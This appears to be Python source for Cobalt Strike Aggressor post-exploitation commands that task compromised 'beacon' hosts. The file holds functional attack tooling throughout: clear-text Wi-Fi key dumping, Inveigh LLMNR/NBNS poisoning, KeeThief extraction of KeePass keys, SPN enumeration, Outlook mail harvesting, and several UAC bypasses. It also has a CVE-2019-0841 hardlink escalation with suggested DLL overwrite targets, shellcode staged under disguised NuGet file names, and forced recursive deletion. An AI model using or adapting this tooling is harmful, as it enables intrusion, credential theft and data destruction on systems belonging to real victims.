def _(bid, profile):
command = """
netsh wlan export profile name="{name}" folder=$env:temp key=clear'
get-content $env:temp:\*{name}*.xml | select-string -pattern '(keyMaterial)|(keyType)'
rm $profile $env:temp:\*{name}*.xml
""".format(name=profile)
aggressor.bpowerpick(bid, command)
def run(bid, program, args=None, silent=False):
# no args
if not args:
args = []
if program in assemblies:
assembly = assemblies[program]
args = helpers.eaq(args)
if not silent:
aggressor.btask(bid,
'Tasked beacon to run {} {}'.format(program, args))
aggressor.bexecute_assembly(bid, assembly, args, silent=True)
elif program in powershell:
script = powershell[program]
aggressor.bpowershell_import(bid, script)
if isinstance(args, list) or isinstance(args, tuple):
args = ' '.join(powershell_quote(args))
aggressor.bpowerpick(bid, ' '.join(args))
elif program in callbacks:
callback = callbacks[program]
callback(bid, args, silent=silent)
else:
raise RuntimeError('Unrecognized program: {}'.format(program))
def _(bid):
command = textwrap.dedent("""
ls $env:localappdata
ls $env:appdata
""")
aggressor.bpowerpick(bid, command)
def _(bid, runtime=99999, *args):
aggressor.bpowershell_import(
bid, utils.basedir('powershell/Inveigh/Inveigh.ps1'))
aggressor.bpowerpick(
bid,
"Invoke-Inveigh -ConsoleOutput N -RunTime {} -Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y {}"
.format(runtime, ' '.join(args)))
def _(bid):
command = """
wmic os get Caption /value | more
wmic qfe
"""
aggressor.bpowerpick(bid, command)
def _(bid):
command = ''
for d in ['Desktop', 'Documents', 'Downloads']:
command += 'ls $env:userprofile\\{}\n'.format(d)
aggressor.bpowerpick(bid, command)
def _(bid):
command = helpers.code_string("""
ls $env:localappdata
ls $env:appdata
""")
aggressor.bpowerpick(bid, command)
def elevate_token_shellcode_csharp(bid, shellcode):
"""
Elevate with token duplication bypass. Execute `shellcode` with a C# helper.
"""
aggressor.bpowershell_import(
bid, utils.basedir('modules/FilelessUACBypass.ps1'))
execute_shellcode = utils.basedir('tools/execute_shellcode.exe')
execute_assembly = utils.basedir('tools/execute_assembly.exe')
stage1 = r'{}\NugetPackage.exe'.format(helpers.guess_temp(bid))
#stage2 = r'{}\nuget_update.package'.format(helpers.guess_temp(bid))
stage2 = r'{}\Stage2.exe'.format(helpers.guess_temp(bid))
package = r'{}\nuget.package'.format(helpers.guess_temp(bid))
helpers.upload_to(bid, execute_assembly, stage1)
helpers.upload_to(bid, execute_shellcode, stage2)
helpers.upload_to(bid, shellcode, package)
command = 'Invoke-TokenDuplication -Binary {}'.format(
powershell_quote(stage2))
aggressor.bpowerpick(bid, command)
aggressor.brm(bid, stage1)
aggressor.brm(bid, stage2)
aggressor.brm(bid, package)
def _(bid):
command = textwrap.dedent("""
wmic os get Caption /value | more
wmic qfe
""")
aggressor.btask(bid, 'Tasked beacon to get patch status')
aggressor.bpowerpick(bid, command, silent=True)
def _(bid):
command = ''
for d in ['Desktop', 'Documents', 'Downloads', 'Favorites']:
command += 'ls $env:userprofile\\{}\n'.format(d)
aggressor.btask(bid, 'Tasked beacon to show common document folders')
aggressor.bpowerpick(bid, command, silent=True)
def _(bid):
command = textwrap.dedent("""
ls $env:localappdata
ls $env:appdata
""")
aggressor.btask(bid, 'Tasked beacon to show AppData')
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *args):
parser = helpers.ArgumentParser(bid=bid, prog='outlook')
parser.add_argument('-f', '--folder', help='Folder name to grab')
parser.add_argument('-s', '--subject', help='Match subject line (glob)')
parser.add_argument('-t',
'--top',
metavar='N',
type=int,
help='Only show top N results')
parser.add_argument('-d',
'--dump',
action='store_true',
help='Get full dump')
parser.add_argument('-o', '--out', help='Output file')
try:
args = parser.parse_args(args)
except:
return
command = ''
command += outlook()
# -f/--folder
if args.folder:
# specified folder
#folder = args.folder.lstrip('\\')
command += helpers.code_string(r"""
$folder = $namespace.Folders.Item("{}")
""".format(folder))
else:
# inbox
command += helpers.code_string(r"""
$folder = $namespace.getDefaultFolder($folders::olFolderInBox)
""")
command += helpers.code_string(r"""
$folder.items""")
# -s/--subject
if args.subject:
command += ' | Where-Object {{$_.Subject -Like "{}"}}'.format(
args.subject)
# -t/--top
if args.top:
command += ' | select -First {}'.format(args.top)
# -d/--dump
if not args.dump:
# print summary only
#command += ' | Format-Table -AutoSize Subject, ReceivedTime, SenderName, SenderEmailAddress'
command += ' | Select-Object -Property Subject, ReceivedTime, SenderName, SenderEmailAddress'
# -o/--out
if args.out:
command += ' > {}'.format(args.out)
aggressor.bpowerpick(bid, command)
def _(bid):
command = helpers.code_string(r"""
Get-Childitem -path env:* |
Select-Object Name, Value |
Sort-Object name |
Format-Table -Auto
""")
aggressor.bpowerpick(bid, command)
def _(bid):
command = helpers.code_string(r"""
Get-Process |
Where { $_.mainWindowTitle } |
Format-Table id,name,mainwindowtitle -AutoSize
""")
aggressor.btask(bid, 'Tasked beacon to list open windows')
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *command):
global _old_bpowerpick
command = ' '.join(command)
if _old_bpowerpick:
_old_bpowerpick(bid, command)
else:
aggressor.bpowerpick(bid, command)
def _(bid):
command = textwrap.dedent(r"""
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* |
Select-Object DisplayName, InstallDate |
Sort-Object -Property DisplayName |
Format-Table -AutoSize
""")
aggressor.bpowerpick(bid, command)
def _(bid):
# KeePassConfig
aggressor.bpowershell_import(bid,
utils.basedir('powershell/KeePassconfig.ps1'))
aggressor.bpowerpick(bid, "Find-KeePassconfig")
# KeeThief
aggressor.bpowershell_import(bid, utils.basedir('powershell/KeeThief.ps1'))
aggressor.bpowerpick(bid, "Get-KeePassDatabaseKey -Verbose")
def _(bid, pattern, out=None):
import_host_recon(bid)
command = 'Get-IndexedFiles {}'.format(powershell_quote(pattern))
if out:
# output to file
command += ' > {}'.format(powershell_quote(out))
aggressor.bpowerpick(bid, command)
def elevate_slui_command(bid, command):
"""
Elevate with slui bypass.
"""
aggressor.bpowershell_import(
bid, utils.basedir('modules/FilelessUACBypass.ps1'))
aggressor.bpowerpick(
bid, 'Invoke-SluiBypass -Command {}'.format(powershell_quote(command)))
def _(bid):
command = textwrap.dedent(r"""
Get-Childitem -path env:* |
Select-Object Name, Value |
Sort-Object name |
Format-Table -Auto
""")
aggressor.btask(bid, 'Tasked beacon to get environmental variables')
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, *dirs):
# default dir is .
if not dirs:
dirs = ['.']
command = ''
for d in dirs:
command += 'Get-ChildItem -Recurse "{}"\n'.format(d)
aggressor.bpowerpick(bid, command)
def _(bid, *dirs):
if not dirs:
aggressor.berror('rmr: specify some directories to kill')
return
command = ''
for d in dirs:
command += 'Remove-Item -Recurse -Force "{}"\n'.format(d)
aggressor.bpowerpick(bid, command)
def _(bid, out=None):
aggressor.bpowershell_import(bid, utils.basedir('powershell/UserSPN.ps1'))
command = 'Get-AccountSPNs'
if out:
# output to file
command += ' > {}'.format(powershell_quote(out))
aggressor.bpowerpick(bid, command)
def elevate_wscript_command(bid, command):
"""
Elevate with wscript bypass.
"""
aggressor.bpowershell_import(
bid, utils.basedir('modules/Invoke-WScriptBypassUAC.ps1'))
aggressor.bpowerpick(
bid, 'Invoke-WScriptBypassUAC -payload {}'.format(
powershell_quote(command)))
def elevate_eventvwr_command(bid, command):
"""
Elevate with eventvwr bypass.
"""
aggressor.bpowershell_import(
bid, utils.basedir('modules/Invoke-EventVwrBypass.ps1'))
aggressor.bpowerpick(
bid,
'Invoke-EventVwrBypass -Command {}'.format(powershell_quote(command)))
def elevate_cve_2019_0841(bid, target, overwrite=None):
r"""
Elevate with CVE-2019-0841. Change permissions of 'target'. Optionally
overwrite 'target' with 'overwrite'.
Good overwrite options:
- C:\Program Files\LAPS\CSE\AdmPwd.dll (then run gpupdate)
- C:\Program Files (x86)\Google\Update\1.3.34.7\psmachine.dll (then wait for google update or run it manually)
"""
native_hardlink_ps1 = utils.basedir('powershell/Native-HardLink.ps1')
edge_dir = r'$env:localappdata\Packages\Microsoft.MicrosoftEdge_*'
settings_dat = r'\Settings\settings.dat'
command = helpers.code_string(r"""
# Stop Edge
echo "[.] Stopping Edge"
$process = Get-Process -Name MicrosoftEdge 2>$null
if ($process) {{
$process | Stop-Process
}}
sleep 3
# Hardlink
$edge_dir = Resolve-Path {edge_dir}
$settings_dat = $edge_dir.Path + '{settings_dat}'
echo "[.] Making Hardlink from $settings_dat to {target}"
rm $settings_dat
Native-HardLink -Verbose -Link $settings_dat -Target {target}
# Start Edge
echo "[.] Starting Edge"
Start Microsoft-Edge:
sleep 3
# Stop it again
echo "[.] Stopping Edge"
$process = Get-Process -Name MicrosoftEdge 2>$null
if ($process) {{
$process | Stop-Process
}}
echo "[+] All Finished!"
echo "[.] New ACLs:"
Get-Acl {target} | Format-List
""".format(edge_dir=edge_dir,
settings_dat=settings_dat,
target=powershell_quote(target)))
aggressor.bpowershell_import(bid, native_hardlink_ps1, silent=True)
aggressor.bpowerpick(bid, command, silent=True)
if overwrite:
helpers.upload_to(bid, overwrite, target)
helpers.explorer_stomp(bid, target)
def _(bid):
command = helpers.code_string(r"""
if (([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
echo "User is a local admin!";
} else {
echo "User is not local admin :(";
}
""")
aggressor.btask(bid, 'Tasked beacon to check if user is a local admin')
aggressor.bpowerpick(bid, command, silent=True)
def _(bid):
command = helpers.code_string(r"""
If ((gwmi win32_computersystem).partofdomain){
Write-Output "User is in domain: $env:userdomain"
} Else {
Write-Output "User is not in a domain"
}
""")
aggressor.btask(bid, "Tasked beacon to check if it's in a domain")
aggressor.bpowerpick(bid, command, silent=True)
def _(bid, profile=None):
if profile:
command = helpers.code_string("""
netsh wlan export profile name="{name}" folder=$env:temp key=clear
$profile = $env:temp:\*{name}*.xml
get-content $profile
rm $profile
""".format(name=profile))
aggressor.bpowerpick(bid, command)
else:
aggressor.bshell(bid, 'netsh wlan show profiles name="*" key=clear');
def _(bid):
command = helpers.code_string(r"""
wmic os get Caption /value
Get-WmiObject -class Win32_quickfixengineering |
Select-Object HotFixID,Description,InstalledBy,InstalledOn |
Sort-Object InstalledOn -Descending |
Format-Table -Auto
""")
aggressor.btask(bid, 'Tasked beacon to get patch info')
aggressor.bpowerpick(bid, command, silent=True)